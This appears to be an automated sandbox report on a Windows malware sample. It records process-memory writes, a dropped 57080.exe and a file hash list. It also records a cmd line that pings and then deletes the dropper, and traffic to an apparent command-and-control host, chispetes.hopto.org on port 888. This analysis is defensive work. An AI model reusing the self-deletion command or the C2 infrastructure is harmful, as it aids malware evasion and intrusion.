N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A
N/A N/A C:\Windows\SysWOW64\Taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4648 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 4648 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 4648 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe
PID 4648 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 4648 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 4648 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\cmd.exe
PID 4864 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4864 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4864 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4972 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 4972 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 4972 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Windows\SysWOW64\Taskmgr.exe
PID 4972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\57080.exe
PID 4972 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe C:\Users\Admin\AppData\Local\Temp\57080.exe

Processes

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

"C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe"

C:\Windows\SysWOW64\PING.EXE

ping 1.1.1.1 -n 1 -w 1000

C:\Windows\SysWOW64\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\57080.exe

"C:\Users\Admin\AppData\Local\Temp\57080.exe"

Network

Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 93.184.221.240:80 tcp
US 20.189.173.13:443 tcp
US 8.8.8.8:53 chispetes.hopto.org udp
ES 90.71.49.17:888 chispetes.hopto.org tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
US 93.184.220.29:80 tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp
US 8.8.8.8:53 www.iptrackeronline.com udp
US 172.67.74.63:80 www.iptrackeronline.com tcp
US 172.67.74.63:443 www.iptrackeronline.com tcp
ES 90.71.49.17:888 chispetes.hopto.org tcp

Files

memory/4648-132-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/4648-133-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/4972-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

C:\Users\Admin\AppData\Local\Temp\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2\35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2.exe

MD5 e141967a41334d6dd1d7c7adac5ca003
SHA1 6f6200ad4360b17ee575b4a761dadc213d34e1b5
SHA256 35a37aefffbaae09847f3e823969e8d7ecd55a5fc8a9d3a078119ef07695a1f2
SHA512 53cad1f2170ec291b2088ac290a8d47c868d2e53d5276d9cf9efe5d917461f98bbe28c03eee7bf5e354e546b420f60c2f9ec31901566b5e27817a558392324d9

memory/4864-137-0x0000000000000000-mapping.dmp

memory/4648-138-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/4972-139-0x0000000074F70000-0x0000000075521000-memory.dmp

memory/1392-140-0x0000000000000000-mapping.dmp

memory/4044-141-0x0000000000000000-mapping.dmp

memory/4972-142-0x0000000074F70000-0x0000000075521000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\57080.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/2464-143-0x0000000000000000-mapping.dmp

\??\c:\users\admin\appdata\local\temp\57080.exe

MD5 fec701bbc6a35f9089309f34afbed29c
SHA1 64a546ef3d03c7af30cd5624db0ad2fd6f611e8f
SHA256 d69c8a09657c966ff51f3451fc762c8a1519cda2dff109de24aab2e33aaa4409
SHA512 b6b466df455cb80e91c5748f4f8847ca0a67e8bb07c70f40c5a548490739d2501093e8343474fcbdf6d3c03dc3e9c0019d87b2283315ae1e63c6bda4a97c807b

memory/2464-146-0x0000000000050000-0x0000000000060000-memory.dmp